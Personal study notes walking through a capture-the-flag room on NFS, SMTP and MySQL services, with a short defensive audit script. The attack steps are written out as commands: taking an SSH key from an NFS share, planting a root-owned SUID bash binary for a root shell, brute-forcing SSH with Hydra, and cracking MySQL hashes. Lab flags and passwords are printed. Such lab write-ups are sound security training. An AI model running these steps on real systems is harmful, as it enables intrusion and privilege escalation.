# Network Service #2

#### What is NFS?

NFS stands for "Network File System". Users and programs can access files on remote systems almost as if they were local files. Files are accessed by clients with whatever privileges are assigned to each file.

#### How does NFS work?

The client requests to mount a directory from a remote host onto a local directory.

If someone wants to access a file using NFS, an RPC (Remote Procedure Call) is placed to NFSD (the NFS daemon) on the server. This call takes parameters such as:

#### What runs NFS?

Using the NFS protocol you can transfer files between computers running Windows and other non-Windows operating systems.

***

## Task 3 - Enumerating NFS

#### What is Enumeration?

"a process which establishes an active connection to the target hosts to discover potential attack vectors in the system, and the same can be used for further exploitation of the system."

#### Requirements

For more advanced enumeration of the NFS server you need extra tools, which come from the `nfs-common` package.

#### NFS-Common

It is important to have this package installed on any machine that uses NFS. It includes programs such as lockd, statd, showmount, nfsstat, gssd, idmapd and mount.nfs (used in the enumeration phase).

#### Port Scanning

The first step of enumeration is to conduct a port scan. You can go as in-depth as you like on this; however, I suggest using nmap with the -A and -p- flags.

#### Mounting NFS shares

You need a local directory (the mount point) through which all the content shared by the host server in the export folder can be accessed. After creating it, you can use the "mount" command to connect the NFS share to the mount point.

`sudo mount -t nfs IP:share /tmp/mount/ -nolock`

***

### Starting Machine:

Nmap scan (screenshot not preserved).

List the shares exported by the NFS server: `/usr/sbin/showmount -e [IP]`

Make the mount directory: `mkdir /tmp/mount`

Connect the NFS share: `sudo mount -t nfs 10.10.193.213:home /tmp/mount/ -nolock`

Inside the NFS mount point there is an SSH private key (`id_rsa`); take it to connect.

Working with SSH (`id_rsa`):

```bash
cp <path-to-id_rsa-on-the-mount> id_rsa   # copy the key off the share
chmod 600 id_rsa                           # ssh refuses a private key with loose permissions
ssh -i id_rsa name@ip
```

SSH connect syntax: `ssh -i id_rsa name@ip`, here `ssh -i id_rsa cappucino@10.10.193.213` (cappucino is the name of the home directory in the mount point).

***

## Task 4 - Exploiting NFS

#### We're done, right?

Not quite: we still need to escalate privileges.

#### What is root\_squash?

By default, NFS enables `root_squash`, which prevents anyone connecting as root from having root access to the NFS volume: remote root users are mapped to the unprivileged user "nfsnobody". If `root_squash` is turned off (the `no_root_squash` export option), a remote root user can create SUID-bit files on the share, which can give a remote user root access on the connected system.

#### SUID

The SUID bit means that the file is run with the permissions of its owner (or, for SGID, its group) rather than those of the user running it; when the owner is root, it runs as the super-user. We can leverage this to get a shell with those privileges!

#### Method

Because of how SUID files work, and because we're able to upload files to the NFS share and control their permissions, we can set the permissions of whatever we upload, in this case a bash shell executable. We can then log in through SSH, as we did in the previous task, and execute this executable to gain a root shell!
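As an added defender-side example (my own code, not from the room or these notes): a small Python audit for the two conditions the method above relies on, an export that disables root squashing and a root-owned setuid file sitting on the share. The `/etc/exports` text is constructed for the example; the `/tmp/mount` path is just the mount point used in these notes.

```python
import os
import shlex
import stat

# Constructed sample /etc/exports; not taken from the room's machine.
SAMPLE_EXPORTS = """\
# home directories exported to everyone without root squashing
/home       *(rw,sync,no_root_squash,no_subtree_check)
/srv/public 10.0.0.0/24(ro,sync,root_squash)
/srv/backup 10.0.0.5(rw,no_subtree_check)
"""

def parse_exports(text):
    """Parse /etc/exports text into (path, client, [options]) tuples."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # drop comments and blank lines
        if not line:
            continue
        fields = shlex.split(line)             # quoted paths are allowed in exports(5)
        path, clients = fields[0], fields[1:] or ["*"]
        for client in clients:
            host, _, opts = client.partition("(")
            options = opts.rstrip(")").split(",") if opts else []
            entries.append((path, host or "*", options))
    return entries

def exports_without_root_squash(text):
    """Exports that disable root squashing: the precondition for the SUID trick."""
    return [e for e in parse_exports(text) if "no_root_squash" in e[2]]

def is_suid_root(mode, uid):
    """True for a regular file that is setuid and owned by uid 0 (root)."""
    return stat.S_ISREG(mode) and bool(mode & stat.S_ISUID) and uid == 0

def find_suid_files(root):
    """Walk a mounted share and return (path, owner uid) for every setuid regular file."""
    hits = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            full = os.path.join(dirpath, name)
            try:
                st = os.lstat(full)             # lstat: never follow symlinks on the share
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append((full, st.st_uid))
    return hits
```

Run `find_suid_files("/tmp/mount")` on the mounted share and flag any hit where `is_suid_root` is true; the same function on the server side catches the planted binary before anyone executes it over SSH.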

#### The Executable

`wget https://github.com/polo-sec/writing/raw/master/Security%20Challenge%20Walkthroughs/Networks%202/bash` (mirror: https://github.com/TheRealPoloMints/Blog/blob/master/Security%20Challenge%20Walkthroughs/Networks%202/bash)

#### Mapped Out Pathway:

#### Starting Machine#2:

Download the bash rev shell: `wget https://github.com/polo-sec/writing/raw/master/Security%20Challenge%20Walkthroughs/Networks%202/bash`. Don't forget `chmod +s` and `sudo chown root bash`.

Get the bash file onto the target: open a server on my machine, get my IP with `ifconfig`, then download over SSH, or (what I did) copy the bash binary to the mount:

```bash
cp bash /tmp/mount/cappucino
```

Alternatively, from the SSH session: `wget ip:port/file` (the IP of my machine was 10.10.60.175).

Note: I don't know which of the three is the right one, but I applied all three to the file:

```bash
sudo chown root bash   # change the owner first: chown clears a setuid bit that is already set
sudo chmod +x bash     # the downloaded file is not executable
sudo chmod +s bash     # setuid bit, set after the chown so it survives
```

Execute the bash file: `./bash -p` (`-p` stops bash from dropping the effective UID back to the real one).

***

## Task 5 - Understanding SMTP

#### What is SMTP?

SMTP (Simple Mail Transfer Protocol) is the protocol used for sending emails.

The SMTP server performs three basic functions:

* It verifies who is sending emails through the SMTP server.
* It sends the outgoing mail
* If the outgoing mail can't be delivered it sends the message back to the sender

#### POP and IMAP

POP is the "Post Office Protocol" and IMAP is the "Internet Message Access Protocol".

#### How does SMTP work?

***

## Task 4 - Enumerating SMTP

```bash
msfconsole -q            # start Metasploit without the banner
search smtp_version
use 0                    # select the first search result
options
set RHOSTS [ip]
options                  # confirm RHOSTS is set
run
```

***

## Task 4 - Exploiting SMTP

#### What do we know?

1. user account name
2. type of SMTP server and OS

#### Preparation

Our port scan showed that the only other open port on this machine is an SSH login. With the user name from the SMTP enumeration we can brute-force the password of the SSH login for that user using Hydra.

#### Hydra

`hydra -t 16 -l USERNAME -P /usr/share/wordlists/rockyou.txt -vV 10.10.179.180 ssh`

Result: user administrator, password alejandro.

#### Login SSH

`ssh USER@IP`, then Password: `THM{who_knew_email_servers_were_c00l?}`

***

## Task 8 - Understanding / Enumerating MySQL

#### What is MySQL?

MySQL is a relational database management system (RDBMS) based on SQL (Structured Query Language).

#### Database

A database is an organised collection of structured data.

#### RDBMS:

An RDBMS is software or a service used to create and manage databases based on a relational model.

"Relational" means that the stored data is organised as tables.

#### SQL:

MySQL is one of the most popular RDBMS software implementations. It uses a client-server model and communicates using Structured Query Language (SQL).

#### How does MySQL work?

MySQL is an RDBMS whose tools help in the administration of MySQL databases.

***

## Task 9 - Enumerating MySQL

#### The Scenario

We're going to assume that you found the **credentials** "*root:password*".

#### Enumerating

The MySQL server listens on port 3306.

Since we have credentials, check them manually: `mysql -h 10.10.248.46 -u root -p`

## Exploit with Metasploit:

1. Use the module.
2. Set the server credentials.
3. Result with the default SQL option.
4. With the SQL option set to "show databases": 4 databases.

***

## Task 10 - Exploiting MySQL

#### What do we know?

1. MySQL server credentials
2. The version of MySQL running
3. The number of databases, and their names

Note: to use the exploits now we need to understand some key terms.

#### Schema

Key terminology:

```
CREATE SCHEMA == CREATE DATABASE
SCHEMA == DATABASE
```

In the Oracle Database product, a schema represents only a part of a database: the tables and other objects owned by a single user.

#### Hashes

A hash function is a cryptographic algorithm that turns a variable-length input into a fixed-length output.

#### Exploiting

Use the first module: fine.

Use the next module, set options and exploit. Crack the password from the file with the hash; result: user carl, password doggie. Nmap shows SSH, so `ssh carl@10.10.103.105` and take thm_ctf.

***